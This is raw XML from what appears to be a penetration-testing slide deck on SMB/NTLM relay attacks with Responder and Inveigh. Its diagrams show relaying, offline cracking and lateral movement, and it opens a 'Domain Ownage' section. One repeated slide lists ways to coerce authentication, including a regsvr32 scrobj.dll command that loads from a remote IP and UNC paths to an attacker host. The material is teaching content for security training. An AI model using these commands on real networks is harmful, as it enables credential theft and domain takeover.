        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="108318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Relay Attacks (responder/inveigh)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8228780" y="2515176"/>
            <a:ext cx="3903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**requires that SMB signing is disabled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Responder | Inveigh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Empire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Metasploit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CME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D1803-5A79-4BBA-92C2-22E3B1F0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6" y="1636020"/>
            <a:ext cx="7718170" cy="4695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013CEF-C5F1-4507-A6D7-F06CD215BF76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2431774" y="6609915"/>
            <a:ext cx="7229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https://pen-testing.sans.org/blog/2013/04/25/smb-relay-demystified-and-ntlmv2-pwnage-with-python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100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4774AD3-5816-4D5F-B6A3-ED5ABB8B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425140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Relay Attacks (responder/inveigh)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284103" y="2004968"/>
            <a:ext cx="1130492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</a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Responder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</a:rPr>
              <a:t> is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/lgandx/Responder</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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2800" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Inveigh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> is a Windows PowerShell LLMNR/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>mDNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>/NBNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>spoofer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>/man-in-the-middle tool”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/Kevin-Robertson/Inveigh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 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E145C1-E091-41CE-AEAE-531438E3E6D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393635" y="1357267"/>
            <a:ext cx="9404724" cy="47464"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C2F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C376D2-6774-4B76-BB8F-6544D5AD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2800127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Relay Attacks (responder/inveigh)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85526" y="2520479"/>
            <a:ext cx="116313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it happen:</a:t>
            </a:r>
          </a:p>
          <a:p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LFI to UNC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Xpath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>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XXE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MySQL out-of-band Attack - ‘INTO OUTFILE’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regsvr32 /s /u /i://10.10.10.101/@UserMan scrobj.dll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[Get-Content | Start-Process | Invoke-Item]  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\\192.168.0.1\aa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F03AB-D92D-41FF-AE08-9E4F2401694B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6488668"/>
            <a:ext cx="100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https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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C7D85F-E1D8-4553-95D1-B97BC051E64F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9611689" y="3758703"/>
            <a:ext cx="173390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Victims Account</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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C8F27811-8CDC-4E9F-8AD0-82375AC8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1193" y="2520479"/>
            <a:ext cx="938827" cy="9388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86299A-FB6B-4CC1-BE80-345215E3D0A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10601572" y="2520213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Victim Machine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="Graphic 28" descr="Computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25A42ADD-3EA8-4886-A812-80AE4E333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2958" y="1829926"/>
            <a:ext cx="831365" cy="83136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4EE29D-171A-4E4D-8D2D-6255FF7C01CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="14" idx="0"/>
            <a:endCxn id="29" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="10478641" y="2661291"/>
            <a:ext cx="0" cy="1097412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8641AB-2F62-4B9F-BE60-0F23184D54F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6047439" y="3531941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Attackers Machine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7EEEA98-2A52-48DF-A78C-49E7AF8A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970785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Relay Attacks (responder/inveigh)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85526" y="2520479"/>
            <a:ext cx="116313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it happen:</a:t>
            </a:r>
          </a:p>
          <a:p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LFI to UNC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Xpath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>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XXE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MySQL out-of-band Attack - ‘INTO OUTFILE’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regsvr32 /s /u /i://10.10.10.101/@UserMan scrobj.dll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[Get-Content | Start-Process | Invoke-Item]  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\\192.168.0.1\aa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F03AB-D92D-41FF-AE08-9E4F2401694B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6488668"/>
            <a:ext cx="100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https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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C7D85F-E1D8-4553-95D1-B97BC051E64F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9611689" y="3758703"/>
            <a:ext cx="173390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Victims Account</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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C8F27811-8CDC-4E9F-8AD0-82375AC8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1193" y="2520479"/>
            <a:ext cx="938827" cy="9388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86299A-FB6B-4CC1-BE80-345215E3D0A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5895039" y="3379541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Attackers Machine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="Graphic 28" descr="Computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25A42ADD-3EA8-4886-A812-80AE4E333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2958" y="1829926"/>
            <a:ext cx="831365" cy="83136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CCF3B1-2C37-4027-BEE5-7D06ACEF95D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940020" y="2245609"/>
            <a:ext cx="3122938" cy="690552"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="82550">
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
            <a:tailEnd type="triangle"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C924F36-99A5-4444-A18C-A8D4EA54BE94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20812303">
            <a:off x="7492342" y="2141988"/>
            <a:ext cx="216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Attack/Exploit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4EE29D-171A-4E4D-8D2D-6255FF7C01CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="14" idx="0"/>
            <a:endCxn id="29" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="10478641" y="2661291"/>
            <a:ext cx="0" cy="1097412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857A93-873C-4F65-8E78-9B599C8ACFFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10601572" y="2520213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Victim Machine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58FA2D-98B4-480C-BD9D-F974DB96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3409205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Relay Attacks (responder/inveigh)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85526" y="2520479"/>
            <a:ext cx="116313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it happen:</a:t>
            </a:r>
          </a:p>
          <a:p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LFI to UNC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Xpath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>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XXE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MySQL out-of-band Attack - ‘INTO OUTFILE’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regsvr32 /s /u /i://10.10.10.101/@UserMan scrobj.dll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[Get-Content | Start-Process | Invoke-Item]  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\\192.168.0.1\aa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F03AB-D92D-41FF-AE08-9E4F2401694B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6488668"/>
            <a:ext cx="100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https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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C7D85F-E1D8-4553-95D1-B97BC051E64F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9611689" y="3758703"/>
            <a:ext cx="173390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Victims Account</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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C8F27811-8CDC-4E9F-8AD0-82375AC8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1193" y="2520479"/>
            <a:ext cx="938827" cy="93882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754AF8-7DBF-48D0-8D24-87A96FF517B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="14" idx="2"/>
            <a:endCxn id="15" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6940020" y="2989893"/>
            <a:ext cx="2671669" cy="1190499"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="92075">
            <a:tailEnd type="triangle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13515B-2BF0-4095-A549-5D29816AD156}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1407130">
            <a:off x="7834769" y="3373068"/>
            <a:ext cx="216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Auth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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86299A-FB6B-4CC1-BE80-345215E3D0A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5895039" y="3379541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Attackers Machine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="Graphic 28" descr="Computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25A42ADD-3EA8-4886-A812-80AE4E333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2958" y="1829926"/>
            <a:ext cx="831365" cy="83136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CCF3B1-2C37-4027-BEE5-7D06ACEF95D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940020" y="2245609"/>
            <a:ext cx="3122938" cy="6905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4EE29D-171A-4E4D-8D2D-6255FF7C01CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="14" idx="0"/>
            <a:endCxn id="29" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="10478641" y="2661291"/>
            <a:ext cx="0" cy="1097412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D3AC53-B01C-40B4-B55A-853ACB2DF2A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10601572" y="2520213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Victim Machine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387B-9925-4850-9469-28A70E261B14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20812303">
            <a:off x="7492342" y="2141988"/>
            <a:ext cx="216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Attack/Exploit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374D94F-A418-4D28-83DB-C45A2DEB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3099177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DF17E4F-FE39-4955-8A83-FD79F843591A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3269482" y="1688848"/>
            <a:ext cx="3953556" cy="2468258"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0B2F6B">
              <a:alpha val="36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Relay Attacks (responder/inveigh)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85526" y="2520479"/>
            <a:ext cx="116313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it happen:</a:t>
            </a:r>
          </a:p>
          <a:p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LFI to UNC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Xpath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>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XXE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MySQL out-of-band Attack - ‘INTO OUTFILE’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regsvr32 /s /u /i://10.10.10.101/@UserMan scrobj.dll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[Get-Content | Start-Process | Invoke-Item]  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\\192.168.0.1\aa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F03AB-D92D-41FF-AE08-9E4F2401694B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6488668"/>
            <a:ext cx="100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https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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C7D85F-E1D8-4553-95D1-B97BC051E64F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9611689" y="3758703"/>
            <a:ext cx="173390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Victims Account</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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C8F27811-8CDC-4E9F-8AD0-82375AC8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1193" y="2520479"/>
            <a:ext cx="938827" cy="93882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754AF8-7DBF-48D0-8D24-87A96FF517B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="14" idx="2"/>
            <a:endCxn id="15" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6940020" y="2989893"/>
            <a:ext cx="2671669" cy="1190499"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9525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13515B-2BF0-4095-A549-5D29816AD156}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1407130">
            <a:off x="7834769" y="3373068"/>
            <a:ext cx="216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Auth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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86299A-FB6B-4CC1-BE80-345215E3D0A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5895039" y="3379541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Attackers Machine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="Graphic 28" descr="Computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25A42ADD-3EA8-4886-A812-80AE4E333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2958" y="1829926"/>
            <a:ext cx="831365" cy="83136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CCF3B1-2C37-4027-BEE5-7D06ACEF95D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940020" y="2245609"/>
            <a:ext cx="3122938" cy="6905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4EE29D-171A-4E4D-8D2D-6255FF7C01CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="14" idx="0"/>
            <a:endCxn id="29" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="10478641" y="2661291"/>
            <a:ext cx="0" cy="1097412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D3AC53-B01C-40B4-B55A-853ACB2DF2A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10601572" y="2520213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Victim Machine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387B-9925-4850-9469-28A70E261B14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20812303">
            <a:off x="7492342" y="2141988"/>
            <a:ext cx="216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Attack/Exploit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682A68-16EA-4D56-A08B-089B5C1ED2DB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382086" y="2326654"/>
            <a:ext cx="1619107" cy="663239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Computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2188A275-8B34-4ED3-B7AD-4BE1251A3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6196" y="1688848"/>
            <a:ext cx="831365" cy="8313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DBAF8C-1295-4116-937C-FA86381D8AB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3409597" y="2326654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Victim Machine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C5E3A-57A1-4CBA-A5E9-1BD0799D57E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1360416">
            <a:off x="5010878" y="2335547"/>
            <a:ext cx="89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Relay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0FD75F0-4C47-4D7A-8EEA-A9696E99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Lateral Movement</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3087957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16F98D4-00C8-4584-9259-3B4BD809F845}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3269482" y="1688848"/>
            <a:ext cx="3953556" cy="2468258"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0B2F6B">
              <a:alpha val="36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Relay Attacks (responder/inveigh)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85526" y="2520479"/>
            <a:ext cx="116313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Make it happen:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US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LFI to UNC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Xpath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>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XXE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MySQL out-of-band Attack - ‘INTO OUTFILE’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800" dirty="0"/>
              <a:t>regsvr32 /s /u /i://10.10.10.101/@UserMan scrobj.dll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[Get-Content | Start-Process | Invoke-Item]  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\\192.168.0.1\aa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F03AB-D92D-41FF-AE08-9E4F2401694B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6488668"/>
            <a:ext cx="100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https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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C7D85F-E1D8-4553-95D1-B97BC051E64F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9611689" y="3758703"/>
            <a:ext cx="173390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Victims Account</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Graphic 14" descr="Computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8F27811-8CDC-4E9F-8AD0-82375AC8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1193" y="2520479"/>
            <a:ext cx="938827" cy="93882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754AF8-7DBF-48D0-8D24-87A96FF517B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="14" idx="2"/>
            <a:endCxn id="15" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6940020" y="2989893"/>
            <a:ext cx="2671669" cy="1190499"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9525"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13515B-2BF0-4095-A549-5D29816AD156}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1407130">
            <a:off x="7834769" y="3373068"/>
            <a:ext cx="216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Auth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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86299A-FB6B-4CC1-BE80-345215E3D0A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5895039" y="3379541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Attackers Machine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="Graphic 28" descr="Computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25A42ADD-3EA8-4886-A812-80AE4E333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2958" y="1829926"/>
            <a:ext cx="831365" cy="83136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CCF3B1-2C37-4027-BEE5-7D06ACEF95D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6940020" y="2245609"/>
            <a:ext cx="3122938" cy="6905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4EE29D-171A-4E4D-8D2D-6255FF7C01CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="14" idx="0"/>
            <a:endCxn id="29" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="10478641" y="2661291"/>
            <a:ext cx="0" cy="1097412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D3AC53-B01C-40B4-B55A-853ACB2DF2A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10601572" y="2520213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Victim Machine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F387B-9925-4850-9469-28A70E261B14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20812303">
            <a:off x="7492342" y="2141988"/>
            <a:ext cx="216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Attack/Exploit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682A68-16EA-4D56-A08B-089B5C1ED2DB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382086" y="2326654"/>
            <a:ext cx="1619107" cy="663239"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="92075" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="sys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Graphic 21" descr="Computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2188A275-8B34-4ED3-B7AD-4BE1251A3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6196" y="1688848"/>
            <a:ext cx="831365" cy="8313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DBAF8C-1295-4116-937C-FA86381D8AB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3269482" y="2347002"/>
            <a:ext cx="14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Password Cracker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C5E3A-57A1-4CBA-A5E9-1BD0799D57E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1360416">
            <a:off x="4966411" y="2076817"/>
            <a:ext cx="110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Offline</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3291079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343AC-0FC2-4DD6-9CFC-5FE2E9F5B0B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1879134" y="2767280"/>
            <a:ext cx="9127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Domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0" err="1"/>
              <a:t>Ownage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502533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Domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Ownage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265124" y="2009410"/>
            <a:ext cx="827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does it mean to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>pwn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> the domain?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
